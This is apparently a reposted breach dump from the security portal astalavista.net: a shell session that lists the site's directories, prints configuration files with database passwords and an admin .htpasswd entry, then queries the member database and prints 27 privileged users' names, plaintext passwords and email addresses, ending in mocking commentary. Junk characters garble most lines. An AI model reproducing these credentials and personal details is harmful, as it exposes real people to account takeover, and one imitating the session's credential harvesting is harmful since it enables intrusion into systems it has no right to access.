drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
8 m$ r3 h" @9 B# e  vdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth5 i% k. ]5 o0 h  V3 P& V
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history+ H9 O. A8 L' b: k4 |# U+ _: S0 c
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
7 e# V& ]. J  X9 z. P9 z4 t-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile$ H3 l  V6 |8 Z& G: S
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
+ f( u5 @% p2 ^2 `drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains" \3 D0 j& J" v+ @) o% h9 W* l
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
4 R, E" t  B. ydrwx——  2 astanet astanet 4096 Dec 23 12:18 mail9 V! A# w# D( M$ U& g
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) O% V, W7 G" n! ~-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow/ a( r! c, K6 D  {; }! S* S' R2 a
) i- D. c6 C4 a. n1 C
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/7 U6 {! v7 `* l1 X3 J
sh-3.2$ ls -la/ b) I5 ]: ?* D$ z' a1 o# o' w) h
total 200
- q3 W3 h; u1 v  qdrwxr-x— 29 astanet apache   4096 Jan  6 13:58 .
( ?  D) Y3 N6 K1 M  E  E+ i: Z6 Fdrwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
2 l& E1 o2 \+ W& Z4 udrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007, S5 _7 Y: v% @7 _/ B
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
3 t- R9 Z4 E8 L6 Wdrwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
; W3 F/ H* h% J' N- B+ Adrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend  n; G$ w0 [9 b, P" _: _+ |
drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner0 d! e) v* @$ K1 d5 b6 k* D( w9 C
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg" Q4 `6 L( ^6 {) L# y$ r* n9 X# Z
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
0 n) v. o8 b# F/ s1 o; v1 Kdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
1 \7 f% |; X/ s( f+ A9 G2 vdrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd. z& c$ O5 W4 C5 C# T
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
" E# u6 [: s  g4 ]3 h; W-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico$ F5 `0 C7 L8 g8 O
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
* h" k' J, U$ F3 C8 G) {drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour9 s5 h& D! ]& h, o1 n
-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
  m" T5 }$ s% O! J: c- j7 H2 D  R) K-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess6 O% w$ x- L# r/ \5 H2 f% l# `
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php. w3 T. L/ L0 a0 s. k  O. D9 a
-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html) X# f2 }% J7 \9 W% z0 L" d
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php$ {3 ?' v5 p& P
-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php  ^+ i) _/ N; Y+ R" W
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf  W& N! E; j$ r8 r
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
7 i/ g3 f7 @3 ~! Vdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
0 {1 A, h. }8 y# ydrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
* H" V  ^' t8 a6 x/ Y6 i# g+ Ddrwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log) K: k) u8 k0 q0 x# D) ?* z6 F) l# x
drwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member% D! s1 B  m5 Y* B
drwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata
6 l6 W. c# q- @  r- `  N* rdrwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new
- P% g( x5 k" }3 ?- a-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf) N6 M$ v: a' c: ^# h
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re
+ G2 }7 m8 Q) W1 t& Y-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
, c/ o* l' u2 M  {! D1 A2 Adrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss
# z" A  z9 x- }( _) Ydrwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
% `5 Y3 W: v$ s  S1 B- L" [, |drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com: E, S/ T. g2 [6 q4 ~+ n0 O. S; [# g
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
* j  T5 O2 b# ~/ q# l3 L0 xdrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
1 D: r+ u" ^! O& pdrwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl0 a* \& c8 _+ i( t4 }3 ~
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2& S7 T" T( W& t& I3 W
drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old  j0 q$ K: a+ z7 S( o( f) P
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php# v6 K* j/ ]" A3 ~9 }# i
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki3 w4 t* i+ K0 t* ]

. U  d, ?$ i* V; L; u* S- rsh-3.2$ head -20 index.php3 U# d) k# h/ S1 N; u) Q* [) I+ E
<?PHP4 `0 f0 |! H* w. A1 v
/**
! J* L0 m% c: \8 Z: ^/ t; m* Mainfile (external) for astalavistaNET v2.0' v1 v, k9 i* l4 c
*
9 g9 {" G# _% L, n* @copyright     Astalavista IT Engineering GmbH
! @: m5 W! W. e3 D/ {: P* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
0 ~' l7 T0 ]) B* @version       1.0
; @  k6 L9 c, {0 J/ [. U*/
+ h+ O  j1 i- \  u' J0 h# q) r5 g6 U2 ?) M, d
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
& U' t$ K: S: n% m- F                $dontStartSession = false;
# K7 X/ F, W2 [( T" i: C/ J        } else {
5 U0 e7 m. O* {# R3 [8 S                $dontStartSession = true;
( g  w: ?% \6 F+ S) e        }
! L3 P. Y9 b' s) f0 w1 ?8 z        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
( m# Q4 I) \- r! g6 N! I. o        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
  Y1 h$ U. e1 Q& u1 E' c3 q0 z        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);+ g4 c( U% v: D1 k" N1 U. P6 v9 \
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
7 n/ I! M; Y# f4 P
% C% g$ w6 A& ~0 hsh-3.2$ cd config7 L& b0 D2 J7 d3 |" r9 x& |( }8 @
sh-3.2$ ls -la
$ ^( B+ L. _- F& D1 f  p$ m& Ptotal 32
+ T( Y' ^3 ?; E2 Udrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .3 P  D2 l2 q  k3 ]0 V$ F
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..7 J% Q9 D# ^; y8 j- G
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php* n( q6 v  \* G- A
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php6 U4 Q) n" T" ~  u" P( F/ T2 q
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php8 q9 _; e1 }5 f0 S7 O% }
-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php- o$ ?7 n+ j$ r# b2 B1 M
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php
# T/ @3 E% A- e  W
6 Y" `) \3 M( G" |, @/ D4 ]sh-3.2$ cat com.conf.php
, U" ~: U0 K+ Z5 U: I& o[snip]
7 k) }4 a7 a( e. ^2 U//member-database# I4 g# _5 }6 Q3 E3 ~
$_CONFIG['db_mem_server']       = ‘localhost’;
% w3 `; \- ?8 _$ |; h% ?$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
( z9 m: _" W; s& M7 h( u$_CONFIG['db_mem_user']         = ‘astanet_db’;
$ W% X( G/ F3 e! {2 B$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 h! x; w4 j) T) j8 K- s
$_CONFIG['db_mem_debug']        = false; //true or false8 \, J; _2 d3 w5 H! ^
//ads-database* u; N" \- K' U$ ^. t
$_CONFIG['db_ads_server']       = ‘localhost’;4 I* Y' X1 S0 y! r; A
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
4 Y' L& m9 A9 C/ p$ {+ ?5 E. z$_CONFIG['db_ads_user']         = ‘astanet_db’;2 l7 B, w* X  M1 P7 n& q; w
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;% E! Z; }4 O( t% z4 T$ K
$_CONFIG['db_ads_debug']        = false; //true or false
5 {# L, F: O) L) p* `! S! f//rainbow-database4 \0 G- C  k, B( d, H! G
$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;& ]4 V& x+ F% i. J
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
+ _/ n3 x1 r( i9 `! I$_CONFIG['db_rainbow_user']     = ‘dinu’;. \* h/ Q' P9 T* ?% X9 k' J
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;3 n: @9 ]7 q! _: x+ n2 ~; ?$ }: _
$_CONFIG['db_rainbow_debug']    = false; //true or false& p& u% S! y% @; Q; ^
//mailing lists database. r3 z& K" e' q! t$ R
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;, S! e- l! h; V, K
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;
* ]7 x+ O7 \' x8 n$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;. _6 s  T5 W0 k3 J6 q' {5 u
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
- T& W9 k# _' w$ h$_CONFIG['db_mailing_lists_debug']              = false; //true or false8 ?4 A) d: Q% \# q0 A: E5 i
//paypal
  Z1 ]2 q% z5 l5 ]8 E7 m$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
! p/ M5 W! `% D( q( x$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
# s2 r; F; f/ q6 v6 p- _$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
- ]# m7 U* t* C$ V2 j0 y9 c, d& o7 k$_CONFIG['sub_pp_noship']       = ‘1′;4 q; b, j6 y/ F, h6 I0 A0 E! x6 B
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;. Q( ]4 d1 w/ M" V& F' _, K
[snip]  o5 O" e) w' k: |# V. q
* B& f1 ^4 \7 }8 h  o; z
sh-3.2$ cd ..5 s) z# b* X5 J. \
sh-3.2$ cd member
7 O, \( ^5 L" m! z. l+ T$ Ish-3.2$ ls -la
. T* A0 S2 }9 B  l( {total 20. o, r& Z. [$ U' v+ d' Q3 U
drwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .! U* Y( l* N$ }) m: t! M" g
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..# N  ^. _! [" u/ z3 x
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess8 H0 W+ R1 n+ {. X  i" `0 B
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php. V: t% K# f6 B( e4 `' E+ M5 r
sh-3.2$ cat .htaccess
+ }0 F- Z/ q: gSecFilterEngine off5 d7 c5 m. L& M4 ?+ y
6 I$ B: M, w$ b7 u3 z0 L- ?
sh-3.2$ cd ..
# Z/ q5 n9 O0 J: Nsh-3.2$ cd cron, K+ |( t" u; A( d0 F1 w1 D
sh-3.2$ ls -la
, k6 {2 l( [. x* {2 D3 rtotal 168% f4 ~( r  t0 y
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .8 [6 \+ v( x/ I8 _
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
  W3 N. D/ \: n2 J; C. U-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php0 c$ W4 e# ?0 g. w
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php' [7 ?% {: m& o) M+ X
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
& |, z  }- I# [& i-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
+ _) _. X7 K5 z+ _$ R6 q-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php" W% P7 {( [0 _; f
-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
6 ^% K, _  Q+ S4 P1 c-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
% c, d  k) O. s9 M6 z-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php0 K8 O7 u' }( ]. x, C
-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh7 R+ H7 D. n7 _+ ?
-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php4 Y5 A0 w- J. O* x$ v) q/ P% E
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
4 n9 _0 y8 w. M' p-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php* A0 g* q- S2 N+ @* {" u
-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh0 H. _- {$ \3 H  I" v5 Q
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php
& s/ g5 ?1 ?1 W* r9 D7 A8 t5 F! ~! C-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
0 ?7 w" S* D% T7 j+ m  I-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
" L: f, ]' p; e5 k- w-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php' H! H) S  K/ a9 W1 F( f0 {
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php$ Y8 w: D. n; T" N. I
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
7 E" r5 h% p6 E-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php1 f/ E1 |0 W: S$ k  s% V
-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php, K% T5 ]) c) \5 y
! W$ T. @8 w, V# I
sh-3.2$ cd ..
, N' s, h: Y8 h* B) O( K' B  csh-3.2$ cd _007
3 V2 U6 Q: d1 X# J) R) z$ K$ wsh-3.2$ ls -la
# Y& d6 I8 c8 h% p$ m9 \% Wtotal 24
' I" N$ ]  {) Bdrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .% O7 Z3 f% F5 ]8 K$ E
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..: q$ S. Q5 _" }. d* a: {2 y+ |
-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
: O4 V7 s1 x; h2 R3 R' C-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php& J; q6 n- t) d$ T5 e) X; S  `9 \
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
8 |. k5 e' C% R! a9 @3 hdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap7 O3 D. [) v: R0 E5 u! X

# A6 Q. p% e5 ], |- ash-3.2$ cat  .htaccess
! q' J* J1 U. x8 k$ |authType Basic
% |0 |9 p* n+ k2 s# gauthName Admin& T& Y! t" L/ J# q4 x" |
authUserFile /home/astanet/auth/.htadm_pwd
, l5 V$ i& Y% @2 U% M1 ~& s1 Drequire valid-user4 x, Z% D8 M8 q0 f8 Q6 T

9 A) O2 }* i7 K: f. r- ish-3.2$ cat /home/astanet/auth/.htadm_pwd# ~6 D" X! @( i7 S( P( Y
admin2net:CR0bl65MwhfT
3 M  p8 B0 K0 @3 N- J0 f
( {* ^' \7 x4 `; B  u% hsh-3.2$ mysql -u astanet_db -p& T0 e) O1 Q1 f8 V+ S8 [
Enter password:
! d; X  r$ L' F4 b; P& oWelcome to the MySQL monitor.  Commands end with ; or \g.
* q/ N; s+ ^+ u9 K. R8 vYour MySQL connection id is 275153/ V/ q0 Z4 a5 F* r) y: {6 t
Server version: 5.0.45-community-log MySQL Community Edition (GPL)* I% R0 N4 Q* Q1 @; ?# ^7 Q
4 J% y, \: D/ x2 Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: F/ I' [: T  t0 U7 s
3 T# P6 U6 F" A  [6 [
mysql> show databases;0 h0 t8 z0 n, N" @" Q: [8 {9 N
+———————–+
: {; e9 _3 G* X4 _3 _| Database              |7 k% g" A5 k/ U' \7 k  ]) ^# A! z
+———————–+( a: ?- A# d* t4 X* [: A
| information_schema    |2 x& Y# J% _4 L4 q1 k  K# j
| astanet_ads           |  e# S! K4 z  q1 q3 {* l
| astanet_mailing_lists |
5 E: ^6 t0 C& {6 c- |' t) p- l| astanet_mediawiki     |
; a! U9 ]7 h- r/ Y8 n4 q| astanet_membersystem  |
  {2 `; _9 T- X3 o3 b| test                  |
# z1 A) `0 |& N& b2 r$ ?# @. f+———————–+' K; n3 d% N& N6 g' h$ x) R
6 rows in set (0.00 sec)
/ [" H0 p* I3 L! Q, r9 e0 i3 F& J6 d! k  H7 e8 S" e' }  P3 h
mysql> use astanet_membersystem
  t$ k$ h" n( H* b1 \" A0 GDatabase changed1 J9 h6 q* r* k4 K2 f* \- Y
mysql> show tables;
, `3 U; l3 V2 _0 E+ S+———————————–+
) j5 H* {  I) G9 s5 ]| Tables_in_astanet_membersystem    |
' k# n: L* z% h: q, x- s  O5 i$ I+———————————–+! [; F$ U- o/ I2 z* c- u2 f1 e
| blacklist_categories              |
/ f; W6 i" }+ a| blacklist_content                 |( H4 }/ @/ F. E9 ]
| blacklist_levels                  |
: P  v. W1 \7 E1 F$ i| blacklist_mcset                   |, s, n% b1 E4 S& J
| dir_categories                    |" W; }6 w. h) O0 \1 h; X% A/ o) n! {
| dir_comments                      |
! o$ L' s- b& s. E| dir_links                         |/ N# f( ~2 n2 y- `* H4 d2 P
| dir_temp                          |7 ]8 }+ G, Y$ a9 |
| dir_votes                         |
' R* R. L  F& c| documents                         |! H7 C3 V6 S3 |  [6 _
| documents_categories              |
/ S0 [; k: e/ u3 X% l5 ~5 C| email_content                     |
4 k0 J% O7 ]7 T' Z1 G% @| email_settings                    |$ m& Z( j7 L+ S1 C, J) Y
| exploits                          |
1 z, b5 g2 Z1 ~| exploits_categories               |" @1 K! p; p, L. j* C
| exploittree_categories            |$ l0 q* |* T7 A
| exploittree_exploits              |' w6 H4 }2 {7 P: ^  l* c) I3 L
| home_values                       |9 ]2 s& F) U  M; Z: O+ e$ m
| iso_countries                     |
& [* u0 e! M( s% ?% B$ X| links_categories                  |
/ B1 [& f0 l8 {& _| links_records                     |" N% e2 O0 l* k
| links_unauth                      |
9 Q  A1 F& y8 }' o| links_votes                       |
, G2 p6 o' o( v7 U8 E( U$ ?| log                               |/ j' u7 T7 E. c  _5 K
| news_categories                   |
" Q9 ?1 ~, e  z| news_comments                     |
& ?. [& f/ O; R; G. b. A| news_emoticons                    |& H: \" r, W; |8 z0 I% H1 Q" |
| news_latest                       |" z. o  Q8 I/ r) Q  R3 ?
| news_messages                     |
8 k# o' [( y4 O| news_statistics                   |2 ^7 S; R! U9 |; J6 z
| news_votes                        |  r; M+ c+ E' @0 u& Y5 G3 S3 b# p" o
| prices_content                    |! Z' @& e; o  e( I  n" c
| prices_offers                     |2 t  L+ ]/ \! G+ h$ e9 x, l
| rss_settings                      |
0 e" T1 i" p9 \: Z% e| sessions                          |5 d$ p4 P7 ]  ?' X/ I
| stats_signups                     |) [) q3 a. \7 d) X1 A7 W! C1 `
| u2u2                              |3 D% K: }9 N) a
| u2u_contact                       |+ l$ a3 \3 w3 M# B5 P' Q4 Y
| u2u_settings                      |
4 k( a1 n9 a" `) k  j% N$ l| user_keywords_selected_categories |. W  {( G+ e+ d4 A3 ?4 b7 v- o2 ~0 m
| users                             |
" t; t4 J3 ^, \& U, s) E| users_ipn_test                    |
* P5 E* _" ^0 I* Q. M3 Z| users_keyword_values              |: H  Y' z+ h  X: J# i
| users_profile                     |
) `* S- u9 J& p, T! d+ F* Q| users_temp                        |
1 h: K) ^1 S' e1 A9 _| users_upgrade                     |
' L5 z, r$ W2 J+———————————–+
' D. h4 D1 i( s46 rows in set (0.00 sec)
2 Y- `( r! a" y# I1 R* Y
, q4 }/ W6 k. mmysql> describe users;
/ I* J5 x( I2 a- i/ Y4 o: j$ C+————————–+————————————–+——+—–+———————+—————-+
. R2 y0 L& m3 p& _" _" n. g) g| Field                    | Type                                 | Null | Key | Default             | Extra          |! _2 b+ k* N" r" s; L6 b( Y) `8 j
+————————–+————————————–+——+—–+———————+—————-+/ s" V9 K$ o$ N
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |# T9 \1 P! S& i& \4 y% W0 L
| user                     | varchar(50)                          | NO   |     |                     |                |
& f9 ?' Y. X) i" _: I7 P| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |3 i/ [; `" f, I2 y' t
| password                 | varchar(30)                          | NO   |     |                     |                |
1 G3 r7 |0 q& G) A7 Z| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |* b9 x: R: {8 ]* f
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |2 O& s+ m/ ]4 P/ n3 ~# ^
| email                    | varchar(50)                          | NO   |     |                     |                |
* U( x6 D$ K; d; Q, i* V| ip                       | varchar(15)                          | NO   |     | 0                   |                |+ Z* d" y. ~0 w' w$ B. f& q4 u
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
( I; R' ?! A4 i$ ^, y: L+ ^| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |* D1 q" F3 y- ^# x) k
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |. w. k4 [5 g: i6 n. [
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
1 ~& `1 y5 [. o# {5 H9 a) M| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
% s7 S; q/ J, z" y) n/ e# I3 t| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |
2 v4 x- |9 ?% {/ ~! m* k' ~% ~| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
. G! N  ?, O  v, `  K| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
! H) v8 P8 \6 m$ Z: y% c3 T! i| lang                     | tinytext                             | NO   |     |                     |                |
+ @, \; s) W8 E' G! `4 m# ?| adid                     | smallint(6)                          | NO   |     | 0                   |                |( l( H2 a; O4 I4 Q! @
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |7 i/ i$ |+ Y- W" G; E
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
" k7 Q: n. Q% k6 q% q| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |. K+ i( b+ _/ `! [8 l) }2 v% a( q1 B
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |) e0 S4 K* A' G( k1 w" ]
+————————–+————————————–+——+—–+———————+—————-+: p% Q& n. I# j+ F
22 rows in set (0.01 sec)9 z* C; p. g7 R4 D# B6 M" {0 E
, `2 f5 H+ y) n8 g
mysql> select count(*) as skids from users;0 X$ ]8 \, M' z9 N
+——-+9 p* k2 c2 t8 {
| skids |
4 i7 b+ s1 w7 T/ c+——-+# z' V* ]2 z5 S% W* q
| 25199 |& T# \2 I! W# H
+——-+4 u* S2 J7 x1 s+ m; n: W
1 row in set (0.00 sec)
  R/ k) k6 |, t; y* x
% k8 b5 c1 W& s8 p3 s: nmysql> select user,nickname,password,email from users where userlevel = 1;5 n  g, _% r: a: O+ Y
+————————–+———————-+——————+———————————–+
5 U$ l9 @: s' E. U; T| user                     | nickname             | password         | email                             |  I9 }2 t; Z; S% V9 ?
+————————–+———————-+——————+———————————–+
) ?1 I% Z# ^, N0 ]) O; d5 q| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |
! n5 }+ U3 j2 w- \- G- h| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
8 g$ W9 W, p0 F4 x0 L$ ?| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |" r# C  Q! Z2 i6 j
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
% y1 }$ n& n3 Y/ O* I| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |) J6 V9 a" f' c  {1 ]
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |
) z) U: v' d; x| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
) i. i: T; Z- g  n+ K+ M& i| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
* W1 p! [# j) b5 L+ k- G( @0 E' g| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |( r4 ]- g+ w& d; p6 g' Y3 Z* B
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
9 G0 \5 h- D" o5 V- p  ^9 Y| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |. B/ T( e7 S( B  v
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |
4 R" d  H5 x3 z+ i| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |- O1 T+ r4 k: {/ U
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
8 ?, x- W9 m2 J3 y% g* ^| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |/ X6 |# H% U! L# c
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
6 m& r- u$ _. R4 c3 k| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |$ S( o, f4 o" V( a) m0 F* Y
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
0 t( ^" Z4 ~8 m. ], v| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |0 Y/ v5 r/ G, E# u; v! R" o: v& H+ j
| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |3 ^. y% c( D* T
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
5 z5 Q) z* }4 B& l| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
$ l1 c  z7 F) k& I4 B, {| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |
) v3 d5 m6 s; |6 A| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |9 A+ S" Z- N6 [5 I  Q
| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |4 K# U" x1 @3 }' ~& d& _" ]2 k
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
* J( H+ _8 o# @# ?| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
/ @8 o- r8 s8 f* c# \7 k9 K% ^+————————–+———————-+——————+———————————–++ f' V4 F" J% t1 q, e
27 rows in set (0.00 sec)
) B* j. [! ~" ~: Z' Z& n1 d3 C( M5 x4 r+ T" z; j2 q: u3 Q
mysql> exit;0 [4 n0 d" F: Z& |
Bye+ d1 B0 I% G- ^: Q7 \$ N
& R, f& ]) H2 l& e0 P7 X; D4 i
[~] plaintext passwords? yes,
( w" K0 N# V/ V! S  a8 Y" ]" K& qThose so called “security professionals” who charge you $6.66 / month to3 ?. q1 |) ]+ X; X
register at their hack-proof portal, save your passwords in plaintext…
. q( C0 k: k1 q% [* F' ?4 x2 t6 ybrilliant!) o9 [. g$ R' R# ^
1 ?; o3 G+ P) m# D
[~] This been fun but we want more.
  Z" ]0 C# q; X7 N4 i6 E2 j6 i0 A! P1 _" V& t2 ~, W# n7 Y
sh-3.2$ uname -a
